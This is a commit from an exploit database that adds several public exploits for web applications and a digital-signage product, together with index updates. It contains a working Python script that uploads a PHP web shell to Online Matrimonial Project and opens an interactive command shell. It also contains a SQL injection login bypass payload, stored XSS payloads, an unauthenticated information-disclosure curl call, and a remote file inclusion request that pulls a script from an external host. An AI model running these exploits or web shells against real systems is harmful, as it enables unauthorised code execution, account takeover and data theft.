DB: 2020-12-04
9 changes to exploits/shellcodes Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020 Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities Online Matrimonial Project 1.0 - Authenticated Remote Code Execution Coastercms 5.8.18 - Stored XSS EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting
This commit is contained in:
parent
0ffa4d35c4
commit
d560e654b7
10 changed files with 349 additions and 2 deletions
69
exploits/hardware/webapps/49186.txt
Normal file
69
exploits/hardware/webapps/49186.txt
Normal file
|
@ -0,0 +1,69 @@
|
|||
# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion
|
||||
# Date: 20.09.2020
|
||||
# Exploit Author: LiquidWorm
|
||||
# Vendor Homepage: https://pro-bravia.sony.net
|
||||
# Version: 1.7.8
|
||||
|
||||
Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion
|
||||
|
||||
|
||||
Vendor: Sony Electronics Inc.
|
||||
Product web page: https://pro-bravia.sony.net
|
||||
https://pro-bravia.sony.net/resources/software/bravia-signage/
|
||||
https://pro.sony/ue_US/products/display-software
|
||||
Affected version: <=1.7.8
|
||||
|
||||
Summary: Sony's BRAVIA Signage is an application to deliver
|
||||
video and still images to Pro BRAVIAs and manage the information
|
||||
via a network. Features include management of displays, power
|
||||
schedule management, content playlists, scheduled delivery
|
||||
management, content interrupt, and more. This cost-effective
|
||||
digital signage management solution is ideal for presenting
|
||||
attractive, informative visual content in retail spaces and
|
||||
hotel reception areas, visitor attractions, educational and
|
||||
corporate environments.
|
||||
|
||||
Desc: BRAVIA digital signage is vulnerable to a remote file
|
||||
inclusion (RFI) vulnerability by including arbitrary client-side
|
||||
dynamic scripts (JavaScript, VBScript, HTML) when adding content
|
||||
though the input URL material of type html. This allows hijacking
|
||||
the current session of the user, execute cross-site scripting code
|
||||
or changing the look of the page and content modification on current
|
||||
display.
|
||||
|
||||
Tested on: Microsoft Windows Server 2012 R2
|
||||
Ubuntu
|
||||
NodeJS
|
||||
Express
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5612
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5612.php
|
||||
|
||||
|
||||
20.09.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
Request:
|
||||
--------
|
||||
|
||||
POST /api/content-creation?type=create&id=174ace2f9371b4 HTTP/1.1
|
||||
Host: 192.168.1.20:8080
|
||||
Proxy-Connection: keep-alive
|
||||
Content-Length: 468
|
||||
Accept: application/json, text/plain, */*
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
|
||||
Content-Type: application/json;charset=UTF-8
|
||||
Origin: http://192.168.1.20:8080
|
||||
Referer: http://192.168.1.20:8080/test.txt
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Cookie: io=RslVZVH6Dc8WsOn5AAAJ
|
||||
|
||||
{"material":[{"name":"http://www.zeroscience.mk/pentest/XSS.svg","type":"html"},{"name":"C:\\fakepath\\Blank.jpg","type":"jpeg"},{"name":"","type":"external_input"},{"name":"","type":""}],"layout":{"name":"assets/images/c4e7e66e.icon_layout_pattern_landscape_003.png","area":3,"direction":"landscape","layouts":[{"index":1,"width":960,"height":1080,"x":0,"y":0},{"index":2,"width":960,"height":540,"x":960,"y":0},{"index":3,"width":960,"height":540,"x":960,"y":540}]}}
|
52
exploits/hardware/webapps/49187.txt
Normal file
52
exploits/hardware/webapps/49187.txt
Normal file
|
@ -0,0 +1,52 @@
|
|||
# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure
|
||||
# Date: 20.09.2020
|
||||
# Exploit Author: LiquidWorm
|
||||
# Vendor Homepage: https://pro-bravia.sony.net
|
||||
# Version: 1.7.8
|
||||
|
||||
Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure
|
||||
|
||||
|
||||
Vendor: Sony Electronics Inc.
|
||||
Product web page: https://pro-bravia.sony.net
|
||||
https://pro-bravia.sony.net/resources/software/bravia-signage/
|
||||
https://pro.sony/ue_US/products/display-software
|
||||
Affected version: <=1.7.8
|
||||
|
||||
Summary: Sony's BRAVIA Signage is an application to deliver
|
||||
video and still images to Pro BRAVIAs and manage the information
|
||||
via a network. Features include management of displays, power
|
||||
schedule management, content playlists, scheduled delivery
|
||||
management, content interrupt, and more. This cost-effective
|
||||
digital signage management solution is ideal for presenting
|
||||
attractive, informative visual content in retail spaces and
|
||||
hotel reception areas, visitor attractions, educational and
|
||||
corporate environments.
|
||||
|
||||
Desc: The application is vulnerable to sensitive information
|
||||
disclosure vulnerability. An unauthenticated attacker can
|
||||
visit several API endpoints and disclose information running
|
||||
on the device.
|
||||
|
||||
Tested on: Microsoft Windows Server 2012 R2
|
||||
Ubuntu
|
||||
NodeJS
|
||||
Express
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5610
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php
|
||||
|
||||
|
||||
20.09.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
$ curl http://192.168.1.20:8080/api/system
|
||||
|
||||
{"__v":0,"_id":"5fa1d6ed9446da0b002d678f","version":"1.7.8","contentsServer":{"url":"http://192.168.1.21/joxy/"},"networkInterfaces":{"lo":[{"address":"127.0.0.1","netmask":"255.0.0.0","family":"IPv4","mac":"00:00:00:00:00:00","internal":true}],"eth0":[{"address":"192.168.1.20","netmask":"255.255.255.0","family":"IPv4","mac":"ZE:R0:SC:13:NC:30","internal":false}]},"serverTime":"2020-12-01T20:13:41.069+01:00","os":"Synology","hostIp":"192.168.1.21"}
|
20
exploits/multiple/webapps/49182.txt
Normal file
20
exploits/multiple/webapps/49182.txt
Normal file
|
@ -0,0 +1,20 @@
|
|||
# Exploit Title: EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass
|
||||
# Date: 02-12-2020
|
||||
# Exploit Author: Mayur Parmar(th3cyb3rc0p)
|
||||
# Vendor Homepage: http://egavilanmedia.com
|
||||
# Software Link : http://egavilanmedia.com/egm-address-book/
|
||||
# Version: 1.0
|
||||
# Tested on: PopOS
|
||||
|
||||
Attack Vector:
|
||||
An attacker can gain admin panel access using malicious sql injection queries.
|
||||
|
||||
Steps to reproduce:
|
||||
1. Open admin login page using following URl:
|
||||
-> http://localhost/Address%20Book/login.php
|
||||
|
||||
2. Now put below Payload in both the fields( User ID & Password)
|
||||
Payload: admin' or '1'='1
|
||||
|
||||
3. Server accepted our payload and we bypassed cpanel without any
|
||||
credentials
|
42
exploits/multiple/webapps/49184.txt
Normal file
42
exploits/multiple/webapps/49184.txt
Normal file
File diff suppressed because one or more lines are too long
39
exploits/multiple/webapps/49188.txt
Normal file
39
exploits/multiple/webapps/49188.txt
Normal file
|
@ -0,0 +1,39 @@
|
|||
# Exploit Title: Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting
|
||||
# Date: 02-12-2020
|
||||
# Exploit Author: Hemant Patidar (HemantSolo)
|
||||
# Vendor Homepage: https://invisioncommunity.com/
|
||||
# Software Link: https://invisioncommunity.com/buy
|
||||
# Version: 4.5.4
|
||||
# Tested on: Windows 10/Kali Linux
|
||||
|
||||
Vulnerable Parameters: Profile - Field Name.
|
||||
|
||||
Steps-To-Reproduce:
|
||||
1. Go to the Invision Community admin page.
|
||||
2. Now go to the Members - MEMBER SETTINGS - Profiles.
|
||||
3. Now click on Add Profile field.
|
||||
4. Put the below payload in Field Name:
|
||||
"<script>alert(123)</script>"
|
||||
5. Now click on Save button.
|
||||
6. The XSS will be triggered.
|
||||
|
||||
|
||||
POST /admin/?app=core&module=membersettings&controller=profiles&tab=profilefields&subnode=1&do=form&parent=3&ajaxValidate=1 HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
Connection: close
|
||||
Content-Length: 660
|
||||
Accept: */*
|
||||
DNT: 1
|
||||
X-Requested-With: XMLHttpRequest
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Origin: https://127.0.0.1
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Dest: empty
|
||||
Referer: https://127.0.0.1/admin/?app=core&module=membersettings&controller=profiles
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
|
||||
Cookie: XYZ
|
||||
|
||||
form_new_activeTab=&form_new_submitted=1&csrfKey=3ffc7a5774ddc0d2a7142d2072191efc&MAX_FILE_SIZE=20971520&pf_title%5B1%5D=%3Cscript%3Ealert(123)%3C%2Fscript%3E&pf_desc%5B1%5D=Test&pf_group_id=3&pf_type=Text&pf_allow_attachments=0&pf_allow_attachments_checkbox=1&pf_content%5B0%5D=&pf_multiple=0&pf_max_input=0&pf_input_format=&pf_member_edit=0&pf_member_edit_checkbox=1&radio_pf_member_hide__empty=1&pf_member_hide=all&radio_pf_topic_hide__empty=1&pf_topic_hide=hide&pf_search_type=loose&pf_search_type_on_off=exact&radio_pf_profile_format__empty=1&pf_profile_format=default&pf_profile_format_custom=&radio_pf_format__empty=1&pf_format=default&pf_format_custom=
|
|
@ -5,6 +5,7 @@
|
|||
# Software Link: https://lepton-cms.org/english/download/archive.php
|
||||
# Version: 4.7.0
|
||||
# Tested on: Windows 10/Kali Linux
|
||||
# CVE: CVE-2020-29240
|
||||
|
||||
Stored Cross-site scripting(XSS):
|
||||
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
|
||||
|
|
23
exploits/php/webapps/49181.txt
Normal file
23
exploits/php/webapps/49181.txt
Normal file
|
@ -0,0 +1,23 @@
|
|||
# Exploit Title: Coastercms 5.8.18 - Stored XSS
|
||||
# Exploit Author: Hardik Solanki
|
||||
# Vendor Homepage: https://www.coastercms.org/
|
||||
# Software Link: https://www.coastercms.org/
|
||||
# Version: 5.8.18
|
||||
# Tested on Windows 10
|
||||
|
||||
XSS IMPACT:
|
||||
1: Steal the cookie
|
||||
2: User redirection to a malicious website
|
||||
|
||||
Vulnerable Parameters: Edit Page tab
|
||||
|
||||
Steps to reproduce:
|
||||
1: Navigate to "http://localhost/admin/login" and log in with
|
||||
admin credentials.
|
||||
2:- Then after login navigates to "Page --> Homepage --> Our Blog" and
|
||||
click on the edit page.
|
||||
3: Then add the payload "<script>alert(123)</script>" & Payload
|
||||
"<h1>test</h1>", and cliock on update button. Saved succesfully.
|
||||
4: Now, click on "View live page" and it will redirect you to the live page
|
||||
at "http://localhost/homepage/blog" and XSS will get stored and
|
||||
trigger on the main home page
|
94
exploits/php/webapps/49183.py
Executable file
94
exploits/php/webapps/49183.py
Executable file
|
@ -0,0 +1,94 @@
|
|||
# Exploit Title: Online Matrimonial Project 1.0 - Authenticated Remote Code Execution
|
||||
# Exploit Author: Valerio Alessandroni
|
||||
# Date: 2020-10-07
|
||||
# Vendor Homepage: https://projectworlds.in/
|
||||
# Software Link: https://projectworlds.in/free-projects/php-projects/online-matrimonial-project-in-php/
|
||||
# Source Link: https://github.com/projectworldsofficial/online-matrimonial-project-in-php
|
||||
# Version: 1.0
|
||||
# Tested On: Server Linux Ubuntu 18.04, Apache2
|
||||
# Version: Python 2.x
|
||||
# Impact: Code Execution
|
||||
# Affected components: Affected move_uploaded_file() function in functions.php file.
|
||||
# Software: Marital - Online Matrimonial Project In PHP version 1.0 suffers from a File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
|
||||
# Attack vector: An authenticated (you can register a user for free) not privileged user is able to upload arbitrary file in the upload form used to send profile pics, if the file is a PHP script, it can be executed.
|
||||
#
|
||||
# Additional information:
|
||||
#
|
||||
# To exploit this vulnerability:
|
||||
# 1) register a not privileged user at /register.php
|
||||
# 2) login in the application /login.php
|
||||
# 3) keep note of the redirect with the GET 'id' parameter /userhome.php?id=[ID]
|
||||
# 4) go to the page /photouploader.php?id=[ID]
|
||||
# 5) upload an arbitrary file in the upload form, in my example, I used a file called shell.php with the content of "<?php system($_GET['cmd']); ?>"
|
||||
# 6) An error will occurr, but the file is correctly uploaded at /profile/[ID]/shell.php
|
||||
# 7) run command system command through /profile/[ID]/shell.php?cmd=[COMMAND]
|
||||
#
|
||||
# How to use it:
|
||||
# python exploit.py [URL] [USERNAME] [PASSWORD]
|
||||
|
||||
|
||||
import requests, sys, urllib, re, time
|
||||
from colorama import Fore, Back, Style
|
||||
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
|
||||
|
||||
def webshell(SERVER_URL, ID, FILE_NAME):
|
||||
try:
|
||||
print(Fore.YELLOW+'[+] '+Fore.RESET+'Connecting to webshell...')
|
||||
time.sleep(1)
|
||||
WEB_SHELL = SERVER_URL+'profile/'+ID+'/'+FILE_NAME
|
||||
getCMD = {'cmd': 'echo ciao'}
|
||||
r2 = requests.get(WEB_SHELL, params=getCMD)
|
||||
status = r2.status_code
|
||||
if status != 200:
|
||||
print(Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
|
||||
r2.raise_for_status()
|
||||
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
|
||||
while True:
|
||||
|
||||
inputCMD = raw_input('$ ')
|
||||
command = {'cmd': inputCMD}
|
||||
r2 = requests.get(WEB_SHELL, params=command, verify=False)
|
||||
print r2.text
|
||||
except:
|
||||
print("\r\nExiting.")
|
||||
sys.exit(-1)
|
||||
|
||||
def printHeader():
|
||||
print(Fore.GREEN+"___ ___ _ _ _ "+Fore.RED+" ______ _____ _____")
|
||||
print(Fore.GREEN+"| \/ | (_)| | | |"+Fore.RED+" | ___ \/ __ \| ___|")
|
||||
print(Fore.GREEN+"| . . | __ _ _ __ _ | |_ __ _ | |"+Fore.RED+" | |_/ /| / \/| |__ ")
|
||||
print(Fore.GREEN+"| |\/| | / _` || '__|| || __|/ _` || |"+Fore.RED+" | / | | | __| ")
|
||||
print(Fore.GREEN+"| | | || (_| || | | || |_| (_| || |"+Fore.RED+" | |\ \ | \__/\| |___ ")
|
||||
print(Fore.GREEN+"\_| |_/ \__,_||_| |_| \__|\__,_||_|"+Fore.RED+" \_| \_| \____/\____/ ")
|
||||
print ''
|
||||
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
printHeader()
|
||||
if len(sys.argv) != 4:
|
||||
print (Fore.YELLOW+'[+] '+Fore.RESET+"Usage:\t python %s [URL] [USERNAME] [PASSWORD]" % sys.argv[0])
|
||||
print (Fore.YELLOW+'[+] '+Fore.RESET+"Example:\t python %s https://192.168.1.1:443/marital/ Thomas password1234" % sys.argv[0])
|
||||
sys.exit(-1)
|
||||
SERVER_URL = sys.argv[1]
|
||||
SERVER_URI = SERVER_URL + 'auth/auth.php'
|
||||
LOGIN_PARAMS = {'user': '1'}
|
||||
LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'}
|
||||
req = requests.post(SERVER_URI, params=LOGIN_PARAMS, data=LOGIN_DATA, verify=False)
|
||||
print(Fore.YELLOW+'[+] '+Fore.RESET+'logging...')
|
||||
time.sleep(1)
|
||||
for resp in req.history:
|
||||
COOKIES = resp.cookies.get_dict()
|
||||
SPLITTED = resp.headers["location"].split("=")
|
||||
ID = SPLITTED[1]
|
||||
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully retrieved user [ID].')
|
||||
time.sleep(1)
|
||||
SERVER_URI = SERVER_URL + 'photouploader.php'
|
||||
LOGIN_PARAMS = {'id': ID}
|
||||
LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'}
|
||||
FILE_NAME = 'shell.php'
|
||||
FILES = {'pic1': (FILE_NAME, '<?php system($_GET[\'cmd\']); ?>'), 'pic2': ('', ''), 'pic3': ('', ''), 'pic4': ('', '')}
|
||||
req = requests.post(SERVER_URI, params=LOGIN_PARAMS, files=FILES, cookies=COOKIES, verify=False)
|
||||
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully uploaded.')
|
||||
time.sleep(1)
|
||||
webshell(SERVER_URL, ID, FILE_NAME)
|
|
@ -72,7 +72,7 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|||
|
||||
try:
|
||||
|
||||
print "[*] Testing connection to tatget %s:%s" %(host,port)
|
||||
print "[*] Testing connection to target %s:%s" %(host,port)
|
||||
s.connect((host, port))
|
||||
|
||||
except:
|
||||
|
|
|
@ -43369,7 +43369,8 @@ id,file,description,date,author,type,platform,port
|
|||
49136,exploits/php/webapps/49136.txt,"Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution",2020-12-01,"Saeed Bala Ahmed",webapps,php,
|
||||
49137,exploits/php/webapps/49137.txt,"LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting",2020-12-01,"Sagar Banwa",webapps,php,
|
||||
49138,exploits/php/webapps/49138.txt,"Medical Center Portal Management System 1.0 - 'login' SQL Injection",2020-12-01,"Aydın Baran Ertemir",webapps,php,
|
||||
49139,exploits/php/webapps/49139.txt,"Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020",2020-12-01,"Matthew Aberegg",webapps,php,
|
||||
49139,exploits/php/webapps/49139.txt,"Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2020-12-01,"Matthew Aberegg",webapps,php,
|
||||
49183,exploits/php/webapps/49183.py,"Online Matrimonial Project 1.0 - Authenticated Remote Code Execution",2020-12-03,"Valerio Alessandroni",webapps,php,
|
||||
49140,exploits/php/webapps/49140.txt,"Social Networking Site - Authentication Bypass (SQli)",2020-12-01,gh1mau,webapps,php,
|
||||
49145,exploits/multiple/webapps/49145.txt,"Tendenci 12.3.1 - CSV/ Formula Injection",2020-12-01,"Mufaddal Masalawala",webapps,multiple,
|
||||
49146,exploits/multiple/webapps/49146.txt,"Expense Management System - 'description' Stored Cross Site Scripting",2020-12-02,"Nikhil Kumar",webapps,multiple,
|
||||
|
@ -43399,3 +43400,9 @@ id,file,description,date,author,type,platform,port
|
|||
49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php,
|
||||
49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,
|
||||
49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
|
||||
49181,exploits/php/webapps/49181.txt,"Coastercms 5.8.18 - Stored XSS",2020-12-03,"Hardik Solanki",webapps,php,
|
||||
49182,exploits/multiple/webapps/49182.txt,"EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass",2020-12-03,"Mayur Parmar",webapps,multiple,
|
||||
49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,
|
||||
49186,exploits/hardware/webapps/49186.txt,"Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion",2020-12-03,LiquidWorm,webapps,hardware,
|
||||
49187,exploits/hardware/webapps/49187.txt,"Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure",2020-12-03,LiquidWorm,webapps,hardware,
|
||||
49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue